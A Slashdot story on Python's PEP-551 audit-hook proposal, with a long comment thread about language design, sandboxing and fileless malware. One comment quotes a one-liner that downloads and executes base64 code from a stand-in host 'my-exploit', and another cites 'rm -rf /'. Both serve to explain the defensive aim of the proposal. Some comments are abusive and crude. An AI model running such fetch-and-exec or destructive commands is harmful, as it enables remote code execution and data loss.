Python May Let Security Tools See What Operations the Runtime Is Performing

An anonymous reader writes: A new feature proposal for the Python programming language wants to add "transparency" to the runtime and let security and auditing tools view when Python may be running potentially dangerous operations. In its current form, Python does not allow security tools to see what operations the runtime is performing. Unless one of those operations generates particular errors that may raise a sign of alarm, security and auditing tools are blind that an attacker may be using Python to carry out malicious operations on a system.

But in Python Enhancement Proposal 551 (PEP-551), Steve Dower, a core Python developer, has proposed the addition of two new APIs that will let security tools detect when Python is executing potentially dangerous operations. The first, the Audit Hook API, will raise warning messages about certain type of Python operations; while the second, the Verified Open Hook API, is a mechanism to let the Python runtime know what files it is permitted to execute or tamper with.

Initial plans were to have PEP-551 ship with Python 3.7, scheduled for release in mid-June 2018, but the proposal did not make the final cut, according to a list of new features added for next month's release. This doesn't mean PEP-551 won't ship with a future version of Python. This is the second major scripting engine to open its runtime to security tools, after PowerShell.

PEP-666

I'm patiently waiting to submit PEP-666 next April 1st.
It's going to add curly braces!

Re:PEP-666

[fluffernutter]

IMHO, forced indentation is what makes Python readable. Matching curly brackets (that may or not be there depending on single statement or multiple, and may not be aligned at all) makes code look terrible.

Re:PEP-666

For me the hard part is: Does python perform the dot operators from left to right or according to
a rule of order (i.e., multiplication/division before add/subtract)?

See further details here:
https://groups.google.com/foru...

Re:PEP-666

Indentation is what makes code readable. Forced indentation makes shitty Python code more readable, but not less shitty otherwise.

Re:PEP-666

Monads make code readable. Indentation is a crutch.

Re:PEP-666

Any time you have forced whitespace or whitespace between keywords the language is broken.
Python and Make are the two most common horribly broken languages.

Re:PEP-666

You are such a perfect miracle imbecile!

I can't believe that you are actually imbecile enough to post this thread here. It makes you look like an even more imbecile fucktard yet.

As some have stated on that thread "dot is NOT an operator", you fucktard! Apparently, you did not read the thread yourself or more likely, your ameba brain reading comprehension doesn't allow you to understand its content.

Re:PEP-666

What a fucking pest!

In the end, he managed to get regular contributors arguing between them and mess up the atmosphere again like he always does.

TOXIC

Re: PEP-666

Yet they're among the most successful tools because, contrary to your nonsensical claim, they actually work very well.

Re:PEP-666

That's dumb, because you can program your IDE to omit the braces visually while being able to easily copy and paste blocks of code and automatically re-indent.

If thats the killer feature of python, it was retarded to make a whole new language and waste collective developer effort on it (writing libraries , tools etc) when the indentation feature could have been written as an IDE plugin for a variety of languages instead, to get the same benefit with none of the downside.

Re:PEP-666

Youshouldreviewyourcommentsbeforeposting.

Actually, I think a language which allowed you to run-on keywords would be pretty disgusting, unless it was carefully designed so that keywords were anyway always separated by something else distinguishable from keywords.

I do agree that as a language, "make" is pretty bad. And every time I have to write in "cmake", I curse their design decision not to have used any other scripting language which already existed rather than invent yet another dumb language. OTOH, that's probably because I write code in those languages a very small percentage of my development time --- otherwise, I might manage to become fluent enough that their lack of intuitiveness wouldn't bother me.

Re:PEP-666

That's dumb, because you can program your IDE to omit the braces visually while being able to easily copy and paste blocks of code and automatically re-indent.

Can I apologise for this rant in advance. Sorry, I know there are many other people who are just as bad and the designers of the Java language will pay more in hell than you, but:

You are the evil in modern programming. The belief that very simple things should be magically hidden by or autocreated by the IDE when simple correct design would have made this all needless. The laziness which layers five different libraries one over the top of the other when just fixing the first one would have made everything right and debugging possible. You are the monkey patch in Ruby.

When I next spend several days debugging a multilayered system problem where the bug is caused by "clever" feature at one layer designed to hide the misfeature at a lower level that the developer could have just fixed in five minutes I will think of you. The curse I come up at that moment with will echo across the aeons. It will contain the strength of feeling of every Slashdotter who has ever dealt with a needlessly and gratuitously incomplete, badly designed and leaky abstraction layer

Re:PEP-666

Don't post it on Slashdot. Someone got banned from Slashdot for posting a parody video on April 1st. Management has no sense of humor whatsoever.

Re:PEP-666

[fluffernutter]

Oh yes, COBOL was broken. No success there.

Re: PEP-666

You got banned because you are a crybaby cuck who does nothing but spam the forums with trash affiliate links. Fuck off and back to McDonald's you fat fuck.

Re: PEP-666

Problem is, the world is full of shitty code, and Iâ(TM)m often forced to read it.

Re: Security Tools Will Never Catch

Yes Boris! We pour vodka up prostitute assholes and drink as it sprays out!

Who will watch the watchers?

Tread carefully here: The morons who did WebRTC and the JavaScript Battery API didn't stop to think of the huge security loopholes they were opening up. People may well have died in oppressive regimes due to the arrogant shortsightedness of these twats.

I'd lilke to see proper Sandboxing but those who have tried to add it have concluded you need to do it from the ground up. Not after the fact like Java did.

Re:Who will watch the watchers?

1) java and javascript are not the same, not even remotely, it is like comparing apples to moon rocks.

2) webRTC is awesome, I am guessing you just heard the buzz word and do not even know what it is since you do not know the difference between java and javascript. Let me educate you:

When you want a real time chat, or to send files to another person, or to do just about anything the webserver is a bottle neck. Data must flow client A to server then out to client B. With webRTC you form a direct connection from client A to client B and remove the webserver in the middle allowing direct data transfer. With this technology you can have a skype type website where people can voice/video chat and you can run the whole thing off a little 35$ raspberry pi because the webserver simply makes the data connection but no longer handles all the streaming data going back and forth.

Re: Who will watch the watchers?

What's your point?

Re:Who will watch the watchers?

1) java and javascript are not the same, not even remotely

They're both shit, so there's that.

Re: Security Tools Will Never Catch

It helps to have some humor when you live in a former superpower that has a smaller economy than Italy's.

Re:Security Tools Will Never Catch

[K.+S.+Kyosuke]

My first post operations.

Your first post-op what?

So many things would have been preventable...

[K.+S.+Kyosuke]

...if only Python had some semblance of sane design, like, e.g., Newspeak does, or other languages with an actual security model.

Re: So many things would have been preventable...

You need to provide more details than that. It's a "programming language"... what security model/features would be needed?

Re: So many things would have been preventable...

Python is not a programming language it is a scripting language. You can call it a programming language when I can compile binaries out of it.

Re: So many things would have been preventable...

[Zero__Kelvin]

Congratulations ... You win "most stupid post of the day" !

Re: So many things would have been preventable...

You've been able to compile Python into binaries for years, idiot.

Re: So many things would have been preventable...

he means interpreted not binaries. But everyone but you knows this. it's common slang.

Re: So many things would have been preventable...

You can't make binaries that don't rely on 100MB worth of "libraries". Lets put it this way. When you can compile a bootloader out of it, it is a programming language, otherwise it's just another java.

Re: So many things would have been preventable...

[psmears]

For what it's worth, Python can be used in a bootloader. OK, the bootloader's not actually written in Python (it's just GRUB), but looks like a cool project anyway :)

Hmm, I might do a vim plugin for that

[raymorris]

You got me thinking, I just might seriously do a vim plugin to add and remove curly braces from Python code. I've coded in a lot of languages over many years, most of which use curly braces, so my eyes/brain process them somewhat automatically. I also block-based operations in vim, which work based on curly braces. I might find it easier / faster to parse Python that had braces inserted temporarily.

This wouldn't be needed if my co-workers didn't write blocks that are FAR longer than any coding standard recommends, but I've had limited success changing their habits. Instead of functions that do one simple thing, they like to write an entire 800-line program as one "function", except it's still not actually a function because it uses global variables from another file. Within their faketion they like to do this:

if can work
      200 lines
              eight levels deep
else
      return error

The only problem with writing such a plugin is that there are a lot of gotchas to finding the beginning and end of Python blocks. Other people have tried to write plugins to delimit Python blocks, but they all fail on real-world Python because a change in leading whitespace doesn't NECESSARILY mean a new block. Only sometimes.

Re:Hmm, I might do a vim plugin for that

Borrow from javascript, it has very sane end of logic rules ie " ; " to end.

If you could also remove the need for those tabs, that would be fantastic, I indent my code with a space and some lines run way over to the right. If I added tabs to that they would run insanely far to the right to the point where it would be a nightmare scrolling over and then trying to memory connect that to what I was just looking at and thinking about.

Re:Hmm, I might do a vim plugin for that

if can work
      200 lines
              eight levels deep
else
      return error

Those monsters!

if !can work
    return error
 
200 lines
          seven levels deep

*sigh* 7 more levels to go

Re:Hmm, I might do a vim plugin for that

[Bongo]

Good grief! I consider myself a total amateur, yet even I don’t do that.

Re:Security Tools Will Never Catch

post-op human, we started with an orangutan.

Python needs semicolons

Begone whitespace!

Re:Python needs semicolons

[The_Dougster]

You need a semi-brain. Begone lest I taunt you some more.

Re:Python needs semicolons

Umm, Python allows semicolons. They're just ignored.

Re: Python needs semicolons

That's badly broken behavior. Having an end of line character is important because it allows the programmer to split things across multiple lines for practical reasons. Properly done it can make code easier to read and easier to work with if you want to do something like temporarily ignore a part of a regex.

Similarly, semantic white space is asking for trouble in cases where poorly configured software messed with it.

Python just sucks. There really aren't two ways about it.

Re: Python needs semicolons

But Python does allow splitting things across multiple lines for practical reasons, and you don't even need a continuation character like some overly verbose languages.

Re:Python needs semicolons

[vtcodger]

Python does not ignore semicolons. Python allows multiple, semicolon separated, statements on the same line.

if YOU_REALLY_WANT_TO : print 'Goodby World"; import sys; sys.exit(255)

The Python Style Guide discourages that, but it's a guide, not a language rule.

Re: Python needs semicolons

[SuperDre]

I beg to differ, semicolons are just cluttering code up. If you need to split a line a character like _ would be good.
To be honest, I stil think the syntax of something like visual basic (classic), is one of the cleanest syntaxes around (I'm only refering to the syntax, not the language itself, that certainly needs some enhancements, haha).

Re: Python needs semicolons

It's not overly verbose. And by having the character you can rejoin the lines together if you really want to. Or,split them back into several ones using a simple regex.

The use of syntactic white space and the like is a pox that needs to be scrubbed out of existence as quickly as possible. It doesn't necessarily have to be semicolons and curly braces, but you do need to be using some sort of characters to indicate code blocks specifically because that's something that you can easily use to identify blocks of code if you want to clean things via sed and regex.

Re:Python needs semicolons

Semicolons at the end of a line are the single most worthless thing I can think of.

Just curious...

[GerryGilmore]

Has anyone shown any POC code that tricks out the Python runtime?
Also, given that Python is all open-source, it would seem that the community which focuses on the runtime component (yes, I know it's the same guys proposing this - bear with me) would have pretty good checks on things, especially buffer overflows, etc.)
Having said that - and obviously not being a Python guru - I'm kinda surprised to learn that even with the amazing plethora of Python modules, there is not already a similar logging/tracing capability available. Yes! Full steam ahead!

Re:Just curious...

I believe this is to do with script code rather than runtime itself. For example, scripter is a malware writer and try to infect malware by overwrite malicious code into certain file on victim's system ?

Sandbox. operating system sandbox, please

[goombah99]

Were re-inventing resource specification sandboxes. The farther you push these things out to the edge rather than at the OS the less uniform policies you have. You become dependent of every app and every plugin the app trusts and every system function the app forks off to have a security policy that matches the one you want. Since you are not the app creator this can't ever happen.

On the other hand if you can define the security policy of what resources an app and all it's children can use then you can have a system wide or app-to-app tailored policy. And even then the app maker, who might know more than you do, could supply a pre-written "suggested" sandbox policy for their app. That is firefox could tell you what directories it will ever access and supply a sandbox for the OS to enforce it on itself. Likewise plugins that violate the norms can come with installers that update the sandbox for their extended needs beyond firefox. Since you can stack sandbox policies you can have a global one then the app specific one so even a hostile installer can't exceed some bounds.

But don't keep trying to write the one-true-secure application. (well do, but don't count on it.) and Don't put the policies in the interpreter.

OSX has a sand box. Linux has a sandbox (dtrace). And I imagine Windows might even have one.

The trouble is no one uses them regularly.

Oh, like MS Windows?

The very proposal that a separate set of some kind of "security tool APIs" are needed indicates to me that something is seriously wrong, fundamentally. There should not be any need for any kind of a "security tool API" for a well-designed, secure, virtual machine.

I am not aware of any kind of a "security tool API" floating around in the Perl ecosphere, and Perl is also a virtual machine-based programming language. Why is that? Why does Python need a "security tool API"? What exactly is so flawed with Python that it can potentially be insecure, and requires a "security tool API" bandaid?

Re: Oh, like MS Windows?

Perl needs it but tools like you are not going to add it.

Already doable!

[Gravis+Zero]

The easy way to accomplish this is to use a system language and a debugger. ;)

On a serious note: do you really want a scripting language "executing potentially dangerous operations"? Seriously, think about it, they aren't signed text files and they are trivial to modify. Sure, there's no agreed upon ELF signing convention but at least it's significantly more difficult for a script to modify.

I know I'll be burned at the stake by those who are in love with Python but that doesn't invalidate my points.

Re:Already doable!

[Waffle+Iron]

On a serious note: do you really want a scripting language "executing potentially dangerous operations"?

You mean like:

#! /bin/sh
rm -rf /

Re:Already doable!

Uhh.. what? ELF binary format is trivial to modify by just about anything, including JavaScript (NodeJS) and Python. Add ten minutes for modification via Bash.

Re: Already doable!

[phantomfive]

It would take you a week to write a tool to take apart an ELF file and add custom code to it. And of course, once the tool is written, you can do it as much as you want. That's how it is with security exploits: some are really tough, but if you write a tool, any script kiddie can exploit it.

Yep

[raymorris]

Indeed. Just the other day I "adjusted" one of my co-workers pull requests just like that. That got rid of two single-line conditional blocks which put the rest of their 200-300 line function two levels deeper than it needed to be.

Re: Yep

.. by using early returns.

Some people would like a word with you.

Re:Security Tools Will Never Catch

Sex change.

You want Python to be more like Rust?

So you want Python to be more like Rust? You want it to be so awkward to use that it's nearly impossible to write insecure code, solely because it's nearly impossible to get the code to compile in the first place?

Re:You want Python to be more like Rust?

[K.+S.+Kyosuke]

No, I'd like Python to be more like Newspeak. I would have thought that idea was clear enough in what I wrote, for example because I used "Python" and "Newspeak" in a single sentence, and, conversely, made no mention of Rust.

Want to improve Python application security?

Want to improve Python application security? How about add some better compile-time checking like proper typed variable declarations, static type checking, static analysis and assertions. You know features that real languages like C, Ada, and even Java have had for a few decades.

I think Python is a pretty garbage language and can't understand its popularity. Things like strong typing and more checking at compile time were learned to be good back in the 60's (e.g. Pascal is an improvement over Algol 68) and I guess we'll just learn those lessons again.

This isn't trying to be flame bait -- I genuinely think Python is a scripting language that is being used as an application programming language and that's a bad idea.

Re:Want to improve Python application security?

[vtcodger]

If you need static typing, you probably shouldn't be using Python. You might want to look into Perl which is similar to Python in many ways and has stricter variable typing. However, many (most?) folks find Perl code to be very difficult to read. Might have something to do with stricter typing. Or maybe it's something else.

Re:Want to improve Python application security?

I'm a javascript developer, we hear endlessly from guys like you about typing in languages. I actually did not just learn javascript though but PHP, Cobol, c, c++, c# (which I cannot tell from .net which I cannot tell from VB) and java. I hated all of them because of their typed variable declarations and setting up declarations for variables instead of just whipping them up out of the blue and using them.

I wonder what the difference is in our brains that makes it such a thing to even care about. Like what is it about my biochemistry that the organic nature of it comes easily and fluidly while for you the structure and hardened architecture give a sense of sturdiness and strength (perhaps? I am guessing).

At any rate, I would have to say you are wrong but not for a technical reason, you are most likely right that typed variable declarations are architecturally superior. The reason you are wrong is because it feels wrong doing it, like using an electric hammer with a keypad instead of just a regular hammer. This is a 'gut' reason though, but the world follows the gut in many mysterious and little understood ways. The organic fluid easy nature of it allows more people to use it and to create and that boiling pot of additional developers allows for more amazing things to come to life at our fingertips every day making it a richer place for all of us.

Re:Want to improve Python application security?

[vtcodger]

As a guy who did software QA for decades, I can tell you that a generally valid argument for strong typing is that it permits compile time checking for problems that otherwise won't be seen until unit test, or (worse) system test, or (much worse) production.

As a programmer, I'm on your side. If I wanted constant aggravation, I'd have picked a different profession.

Re: Security Tools Will Never Catch

This is SPARTA!!

You, good sir, have challenged the internet to a fatal duel.

Those people are wrong. Unless

[raymorris]

A single return is good if you write 4-20 line functions, which is common in many communities, and I favor that style.

If you're going to have a 200-line function, it's better to do your input validation and "exception handling" up front like this:

if (denominator == 0 ||
denominator == null ||
numerator == null) {
      return error
}

Rather than have your entire 200-line body three levels deeper than it needs to be, putting some blocks 6 or 8 levels deep. If course actual exception handling is another conversation.

NIce product

Nice idea

What is this anyway?

[vtcodger]

I read through the comments and still didn't have a clue what the article is about. So I took the drastic step of actually reading the PEP.

AFAICS, What is proposed is that the Python runtime provide some hooks that allow system administrators to observe/log some events occurring in scripts. That's useful because Python provides access to just about anything one might want to do via dynamically loadable modules.

Will it actually be usable for anything? I haven't a clue. My gut feeling is probably not very. But what do I know?

Can it be used for evil? Probably. But I should think that the risk from malicious modules and code vastly outweighs any additional risk from these hooks.

Re:What is this anyway?

[thesupraman]

Isnt the larger question really 'why'?
As in why would python try and do what is done, for very good reasons, at OS level already, and if it is not, things are completely broken anyway?

After all there is that tiny little loophole of C extensions, or hell, just writing the nasty programs in C (or just about any other language) to behind with?

I basically read this as 'Python has a HUGE problem because it works like pretty much every other language out there, quick, fix it!'

ie: someone stiring up a storm in a teacup to get their personal pet project fasttracked in to the core.

Re:What is this anyway?

[vtcodger]

We're way beyond my tiny area of competence here, but PEP551 https://www.python.org/dev/pep... includes an example:

python -c "import urllib.request, base64;
        exec(base64.b64decode(
                urllib.request.urlopen('http://my-exploit/py.b64')
        ).decode())"

The PEP asserts that sort of thing bypasses (most) malware scanners and file access controls because there is no file written to disk. Could be. The problem from the sys admin point of view is that you (hypothetically) can't just forbid running Python scripts because you have users in accounting, shipping, marketing, etc that need Python in order to do their job. The language is everywhere. And there is no real provision for distinguishing OK Python from malicious Python.

The PEP apparently provides some capability to spot Python scripts doing stuff that seems suspiscious. I'm hazy on how. For details, try the PEP.

Re:What is this anyway?

[ElizabethGreene]

PowerShell has similar functionality, and I can speak a little on why they did it.

"Normal" AV looks at files. You read a file and it's scanned. You write a file and it's scanned. File-less attacks nullify this approach by never dropping anything to the disk. They call PowerShell (or Python, apparently) by passing in a script block, the equivalent of a one-liner that is Eval()'d. To help close this hole and expose scriptblocks to AV PowerShell added features to decode incoming scriptblocks, log them, and explicitly expose to AV before executing them.

It looks like Python is doing the same. Good for them.

Ref: https://blogs.technet.microsof...
Disclaimer: I work for Microsoft as a Windows Platforms PFE, therefore my opinion is invalid. This post is my own work and understanding, and is probably wrong.

Re:What is this anyway?

We had it to too good with Python for too long. It is time "security" tools stepped in and questioned if what we are doing is really good for us. From time to time every Python program will be stopped and a modal dialogue window will pop up and prompt that Mcafee-Norton detected a potentially dangerous operation that must cease and desist. Of course your friendly sysadmin is free to manually click through 20 layers of menus and manually disable this alert for every machine he/she happens to admin. I wonder why did Python maintainers even agreed to this.

And the malware tools to use those APIs

[whitroth]

... will be available the day before the standard's officially released.